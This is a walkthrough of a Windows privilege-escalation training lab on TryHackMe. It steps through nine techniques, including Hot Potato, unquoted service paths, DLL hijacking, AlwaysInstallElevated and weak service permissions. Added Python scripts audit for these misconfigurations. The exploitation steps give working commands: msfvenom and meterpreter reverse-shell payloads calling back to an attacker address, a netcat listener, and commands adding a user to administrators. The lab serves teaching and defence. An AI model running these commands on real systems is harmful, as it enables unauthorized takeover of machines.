WinPrivEsc





This walkthrough corresponds to the Windows PrivEsc Arena room on TryHackMe, created by The Cyber Mentor.

We have access to the machine over RDP with the user account.

The first task is to find the default users:
cmd.exe > net user

 

(PrivEsc 1)$> Password Mining Escalation[Configuration File]


This path relies on reading a configuration file left behind by installed software:
notepad C:\Windows\Panther\Unattend.xml
Look for values that could be passwords.
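
An added example (not part of the original walkthrough) of the same check from the administrator's side: it scans an answer file for password elements that still carry a value, without printing the value itself. The sample XML is constructed, and treating a missing PlainText element as plaintext is an assumption.

```python
import xml.etree.ElementTree as ET

# Placeholder Windows Setup writes over a password once it has been consumed.
REDACTED = "*SENSITIVE*DATA*DELETED*"
PASSWORD_TAGS = {"Password", "AdministratorPassword"}

# Constructed sample in the unattend schema; names and values are made up.
SAMPLE_UNATTEND = """<unattend xmlns="urn:schemas-microsoft-com:unattend">
 <settings pass="oobeSystem">
  <component name="Microsoft-Windows-Shell-Setup">
   <AutoLogon>
    <Username>Admin</Username>
    <Password><Value>Q29uc3RydWN0ZWQ=</Value><PlainText>false</PlainText></Password>
   </AutoLogon>
   <UserAccounts>
    <AdministratorPassword><Value>*SENSITIVE*DATA*DELETED*</Value></AdministratorPassword>
    <LocalAccounts><LocalAccount>
     <Name>svc-build</Name>
     <Password><Value>Example-Pass1</Value><PlainText>true</PlainText></Password>
    </LocalAccount></LocalAccounts>
   </UserAccounts>
  </component>
 </settings>
</unattend>"""


def local(tag):
    """Strip the '{namespace}' prefix ElementTree puts on tag names."""
    return tag.rsplit("}", 1)[-1]


def find_leftover_credentials(xml_text):
    """Return password elements whose Value is still present (value itself omitted)."""
    findings = []

    def walk(node, trail):
        trail = trail + [local(node.tag)]
        if trail[-1] in PASSWORD_TAGS:
            fields = {local(c.tag): (c.text or "").strip() for c in node}
            value = fields.get("Value", "")
            if value and value != REDACTED:
                # PlainText=false only means base64, not encryption (assumed default: plaintext)
                encoded = fields.get("PlainText", "true").lower() == "false"
                findings.append({"element": "/".join(trail),
                                 "encoding": "base64" if encoded else "plaintext"})
        for child in node:
            walk(child, trail)

    walk(ET.fromstring(xml_text), [])
    return findings
```

Any finding means the credential should be rotated and the answer file removed or cleaned.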

(PrivEsc 2)$> Potato Escalation[Hot Potato] using Tater

Hot Potato#> How it works=>

It takes advantage of NTLM relay, specifically HTTP -> SMB relay.
The technique combines two known Windows issues, NBNS spoofing and NTLM relay, with a fake WPAD proxy server running locally on the target host.

We will use Tater, which is a PowerShell implementation of the exploit:


1. In command prompt type: powershell.exe -nop -ep bypass
2. In PowerShell prompt type: Import-Module C:\Users\User\Desktop\Tools\Tater\Tater.ps1
3. In PowerShell prompt type: Invoke-Tater -Trigger 1 -Command "net localgroup administrators user /add"
4. To confirm that the attack was successful, in PowerShell prompt type: net localgroup administrators

The command in step 3 adds user to the administrators group.

For more info about hot potato visit:- https://foxglovesecurity.com/2016/01/16/hot-potato/


(PrivEsc 3)$> Service Escalation [Unquoted Service Path]

An unquoted service path is a severe vulnerability.

[What is USP?]#> When a program in Windows has a path without quotes, the path is called an unquoted service path.
Like 

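[Why is this vuln dangerous?]#> It can lead to access with SYSTEM privileges (if the service is running with SYSTEM privileges, which is the case most of the time).

Because the path is not quoted, Windows treats each space as a possible end of the executable name and tries every prefix in turn, so a malicious program placed at one of those prefixes runs instead of the intended binary. An example of such a path:
c:\program files\sub dir\program.exe name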


[How to check?]#> 

In cmd:

wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """


 Windows VM

1. Open command prompt and type: sc qc unquotedsvc
2. Notice that the “BINARY_PATH_NAME” field displays a path that is not confined between quotes.
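
An added example, not from the room or the original walkthrough: it applies the same filters as the wmic one-liner and then lists, for each unquoted path, the locations Windows tries before the intended binary, the directories whose write permissions need review, and the quoted form that fixes the entry. The service rows are constructed sample data, and splitting the executable from its arguments at the first .exe is a simplifying assumption.

```python
import ntpath
import re

# Constructed rows shaped like the wmic columns above: (name, pathname, startmode).
SAMPLE_SERVICES = [
    ("updatesvc", r"C:\Program Files\Sample Vendor\Update Agent\agent.exe -run", "Auto"),
    ("quotedsvc", r'"C:\Program Files\Sample Vendor\Quoted App\svc.exe" -k run', "Auto"),
    ("toolsvc", r"C:\Tools\agent.exe --service", "Auto"),
    ("winsvc", r"C:\Windows\system32\svchost.exe -k netsvcs", "Auto"),
    ("manualsvc", r"C:\Program Files\Sample Vendor\On Demand\od.exe", "Manual"),
]


def executable_part(pathname):
    """Best-effort split of the executable from its arguments (assumption: first '.exe')."""
    m = re.match(r"(.+?\.exe)(?=\s|$)", pathname.strip(), re.IGNORECASE)
    return m.group(1) if m else pathname.strip()


def search_order(pathname):
    """Paths Windows tries, in order, before the intended binary; empty if quoted."""
    if pathname.lstrip().startswith('"'):
        return []
    tokens = executable_part(pathname).split(" ")
    return [" ".join(tokens[:i]) + ".exe" for i in range(1, len(tokens))]


def audit(services):
    """Same filters as the wmic/findstr one-liner, minus paths that contain no space."""
    findings = []
    for name, pathname, startmode in services:
        if startmode.lower() != "auto" or "c:\\windows\\" in pathname.lower():
            continue
        tried = search_order(pathname)
        if not tried:
            continue  # quoted, or unquoted but without a space before the .exe
        exe = executable_part(pathname)
        findings.append({
            "service": name,
            "tried_first": tried,
            # a non-admin write ACL on any of these directories makes the path exploitable
            "check_acl_on": [ntpath.dirname(p) for p in tried],
            # value to store as the service's binary path to close the issue
            "quoted_fix": '"' + exe + '"' + pathname.strip()[len(exe):],
        })
    return findings
```

Unlike the one-liner, the script drops unquoted paths that contain no space, which are listed by findstr but cannot be abused this way.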

Exploitation

Kali VM

1. Open command prompt and type: msfvenom -p windows/exec CMD='net localgroup administrators user /add' -f exe-service -o common.exe
2. Copy the generated file, common.exe, to the Windows VM.

Windows VM

1. Place common.exe in ‘C:\Program Files\Unquoted Path Service’.
2. Open command prompt and type: sc start unquotedsvc
3. It is possible to confirm that the user was added to the local administrators group by typing the following in the command prompt: net localgroup administrators

This adds user to the local administrators group.
The user must have permission to restart the service.

 For further reference:- https://pentestlab.blog/2017/03/09/unquoted-service-path/

 (PrivEsc 4)$> Service Escalation [BinPath]

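[BinPath?]

When a low-privileged user can modify the configuration of a service that executes as admin, the service's BinPath can be changed to a command of the user's choosing.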

[Detection]

Windows VM

1. Accesschk64.exe servsvc

2. Notice that the output suggests that the user “User-PC\User” has the “SERVICE_CHANGE_CONFIG” permission.
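
An added example, not part of the original walkthrough: the built-in sc sdshow <service> command prints a service's security descriptor as an SDDL string, and this script picks out the allow entries that give broad groups SERVICE_CHANGE_CONFIG or an equivalent right. The SDDL string is constructed for a hypothetical service, not taken from the lab.

```python
import re

# SDDL right codes that let the holder reconfigure or take over a service.
RISKY_RIGHTS = {
    "DC": "SERVICE_CHANGE_CONFIG",
    "WD": "WRITE_DAC",
    "WO": "WRITE_OWNER",
    "GA": "GENERIC_ALL",
    "GW": "GENERIC_WRITE",  # maps to SERVICE_CHANGE_CONFIG for services
}
# The same rights when the ACE carries a hex access mask instead of letter codes.
RISKY_BITS = {0x0002: "SERVICE_CHANGE_CONFIG", 0x40000: "WRITE_DAC", 0x80000: "WRITE_OWNER"}
# Well-known SDDL trustee aliases that cover ordinary logged-on users.
BROAD_TRUSTEES = {"WD": "Everyone", "AU": "Authenticated Users",
                  "IU": "Interactive", "BU": "Builtin Users"}

# Constructed `sc sdshow` output for a hypothetical service.
SAMPLE_SDDL = ("D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)"
               "(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
               "(A;;CCLCSWLOCRRC;;;IU)"
               "(A;;RPWPDC;;;AU)"
               "S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)")


def risky_aces(sddl):
    """Return (trustee, [rights]) for allow ACEs that hand risky rights to broad groups."""
    # Keep only the DACL: the SACL after 'S:' holds audit entries, not permissions.
    dacl = sddl.split("D:", 1)[-1].split("S:", 1)[0]
    findings = []
    for ace in re.findall(r"\(([^)]*)\)", dacl):
        fields = ace.split(";")
        if len(fields) != 6:
            continue
        ace_type, _flags, rights, _obj, _inherit_obj, trustee = fields
        if ace_type != "A" or trustee not in BROAD_TRUSTEES:
            continue
        if rights.lower().startswith("0x"):
            mask = int(rights, 16)
            granted = [name for bit, name in RISKY_BITS.items() if mask & bit]
        else:
            codes = re.findall("..", rights)  # SDDL right codes are two letters each
            granted = [RISKY_RIGHTS[c] for c in codes if c in RISKY_RIGHTS]
        if granted:
            findings.append((BROAD_TRUSTEES[trustee], granted))
    return findings
```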

[Exploitation]

Windows VM

1. In command prompt type: sc config servsvc binpath= "net localgroup administrators user /add"
2. Now restart the service.
3. Now check the local administrators group.

(PrivEsc 5)$> Service Escalation [DLL Hijacking]

[What is a DLL?]#
DLL stands for dynamic-link library. A DLL contains code that can be used by more than one program.
For more info visit:- https://support.microsoft.com/en-us/help/815065/what-is-a-dll

[What is DLL Hijacking?]#

Suppose a program runs and a DLL is missing from the location where Windows looks for it. A malicious DLL can then be placed at that location and used to escalate privileges.

[Detection]#

1. Launch ProcMon in Windows and check for processes with missing DLLs.
2. Check the permissions of the folder.

[Attack]#

Victim machine:-
1. Create a malicious DLL :- msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=[Kali VM IP Address] LPORT=[PORT] -f dll > hijack.dll
2. Copy the DLL to the path of the function
3. sc stop dllsvc & sc start dllsvc

Attacker machine:-
1. nc -lvnp "PORT"

(PrivEsc 6)$> Priv Escalation [Startup via administrator]

[Detection] 

Windows VM
1. Open command prompt and type: icacls.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
2. From the output notice that the “BUILTIN\Users” group has full access ‘(F)’ to the directory.

[Exploitation]

Kali VM

1. Open command prompt and type: msfconsole
2. In Metasploit (msf > prompt) type: use multi/handler
3. In Metasploit (msf > prompt) type: set payload windows/meterpreter/reverse_tcp
4. In Metasploit (msf > prompt) type: set lhost [Kali VM IP Address]
5. In Metasploit (msf > prompt) type: run
6. Open another command prompt and type: msfvenom -p windows/meterpreter/reverse_tcp LHOST=[Kali VM IP Address] -f exe -o x.exe
7. Copy the generated file, x.exe, to the Windows VM.

Windows VM

1. Place x.exe in “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup”.
2. Logoff.
3. Log in with the administrator account credentials.

Kali VM

1. Wait for a session to be created; it may take a few seconds.
2. In Meterpreter (meterpreter > prompt) type: getuid
3. From the output, notice the user is “TCM”
  
(PrivEsc 7)$> Registry Escalation [AlwaysInstallElevated]

Installing a malicious MSI package with elevated privileges

[Detection]#

reg query HKLM\Software\Policies\Microsoft\Windows\Installer

As we can see, AlwaysInstallElevated is set to 1, so we can take advantage of it.

[Exploitation]#

1. Payload => msfvenom -p windows/meterpreter/reverse_tcp lhost=[Kali VM IP Address] -f msi -o setup.msi
2. Copy it to the Windows machine and start multi/handler on the Kali machine
3. On the Windows machine: msiexec /quiet /qn /i C:\Temp\setup.msi


(PrivEsc 8)$> Service Escalation [Registry]

[Detection]#

Run this command in PowerShell:
Get-Acl -Path hklm:\System\CurrentControlSet\services\regsvc | fl
As we can see, “NT AUTHORITY\INTERACTIVE” has “FullControl” permission over the registry key.

[Exploitation]#

Check the program given in windows_service.c.
Transfer it to the Kali box and compile it: x86_64-w64-mingw32-gcc windows_service.c -o x.exe

Now transfer x.exe to the temp folder of the Windows machine and execute this command to add the program to the registry:

reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d c:\temp\x.exe /f

sc stop regsvc & sc start regsvc

(PrivEsc 9)$> Service Escalation [Executable file]

The same malicious executable can be used here as well.

[Detection]#

accesschk64.exe -wvu "C:\Program Files\File Permissions Service"

If the group has FILE_ALL_ACCESS

Hurray!!! Privesc will work
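
An added example, not part of the original walkthrough, that serves both this check and the Startup folder check in PrivEsc 6: it parses icacls output and reports broad groups that can write to the directory. The icacls output below is constructed, and the list of groups treated as broad is an assumption to adjust per environment.

```python
import re

# Inheritance markers that icacls prints in the same parentheses as rights.
INHERIT_FLAGS = {"I", "OI", "CI", "IO", "NP"}
# icacls simple and specific rights that let the trustee add or replace files.
WRITE_RIGHTS = {"F", "M", "W", "GA", "GW", "WD", "AD", "WDAC", "WO"}
# Assumption: groups that include ordinary users on a typical workstation.
BROAD = {"everyone", "builtin\\users", "nt authority\\authenticated users",
         "nt authority\\interactive"}

# Constructed icacls output for the Startup folder from PrivEsc 6.
STARTUP = r"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
SAMPLE_ICACLS = STARTUP + r""" BUILTIN\Users:(F)
    NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
    BUILTIN\Administrators:(I)(OI)(CI)(F)
    BUILTIN\Users:(I)(OI)(CI)(RX)
    Everyone:(I)(OI)(CI)(RX)

Successfully processed 1 files; Failed processing 0 files
"""


def writable_by_broad_groups(path, icacls_output):
    """Return (trustee, [rights]) for broad groups holding write-capable rights."""
    findings = []
    for line in icacls_output.splitlines():
        # The first ACL line is prefixed with the path itself; strip it.
        entry = line.replace(path, "", 1).strip()
        m = re.fullmatch(r"(.+?):((?:\([^)]*\))+)", entry)
        if not m:
            continue  # blank lines and the "Successfully processed" footer
        trustee = m.group(1)
        groups = re.findall(r"\(([^)]*)\)", m.group(2))
        rights = {r for g in groups if g not in INHERIT_FLAGS for r in g.split(",")}
        hits = sorted(rights & WRITE_RIGHTS)
        if trustee.lower() in BROAD and hits:
            findings.append((trustee, hits))
    return findings
```

The same function works on icacls output for a service's program directory, where a hit means the service binary can be replaced by a non-administrator.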

[Exploitation]#

On the Windows machine

copy /y c:\Temp\x.exe "c:\Program Files\File Permissions Service\filepermservice.exe"

sc start filepermsvc

For setup and programs visit:- https://github.com/sagishahar/lpeworkshop.git

